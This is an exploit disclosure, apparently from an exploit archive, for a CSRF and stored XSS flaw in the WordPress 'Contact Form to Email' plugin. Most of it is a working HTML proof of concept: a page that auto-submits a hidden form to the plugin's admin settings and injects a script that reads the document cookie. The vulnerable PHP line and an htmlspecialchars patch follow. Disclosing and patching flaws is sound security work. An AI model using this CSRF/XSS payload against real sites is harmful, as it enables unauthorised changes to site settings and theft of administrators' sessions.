/***********************************************************************************
** Exploit Title: Wordpress Contact Form to Email Plugin CSRF/XSS
**
** Exploit Author: Ashiyane Digital Security Team
**
** Discovered By: Mahdi.Hidden
**
** Vendor Homepage : https://wordpress.org/plugins/contact-form-to-email/
**
** Software Link:
https://downloads.wordpress.org/plugin/contact-form-to-email.zip
**
** Google Dork: none
**
** Date: 2015-05-13
**
** Tested on: Windows 7 / Mozila Firefox
**
***********************************************************************************
** Exploit Code:
******************
<html>
<body>
<form name="updatereportsettings"
action="http://localhost/wordpress/wp-admin/admin.php?page=cp_contactformtoemail"
method="post">
<input type="hidden" name="cp_cfte_rep_enable" value="No">
<input type="hidden" name="cp_cfte_rep_hour" value="00">
<input name="cp_cfte_fp_from_email" value="Hidden" type="hidden">
<input name="cp_cfte_rep_emails" value="Hidden" type="hidden">
<input name="cp_cfte_rep_subject" value="hidden" type="hidden">
<input type="hidden" name="cp_cfte_rep_emailformat" value="text">
<input type="hidden" name="cp_cfte_rep_message"
value='"></textarea><script>alert(document.cookie)</script>'>
<script language="Javascript">
setTimeout('updatereportsettings.submit()', 1);
</script>
</form>
</body>
</html>
***********************************************************************************
** Vulnerable Code:
******************
<textarea type="text" name="cp_cfte_rep_message" rows="3"
cols="80"><?php echo get_option('cp_cfte_rep_message', 'Attached you
will find the data from the form submissions.'); ?></textarea></td>
To Patch XSS :
<textarea type="text" name="cp_cfte_rep_message" rows="3"
cols="80"><?php echo
htmlspecialchars(get_option('cp_cfte_rep_message', 'Attached you will
find the data from the form submissions.')); ?></textarea></td>
***********************************************************************************
** Special thanks to: ACC3SS - Milad Hacking - T3rm!nat0r5
***********************************************************************************
***********************************************************************************\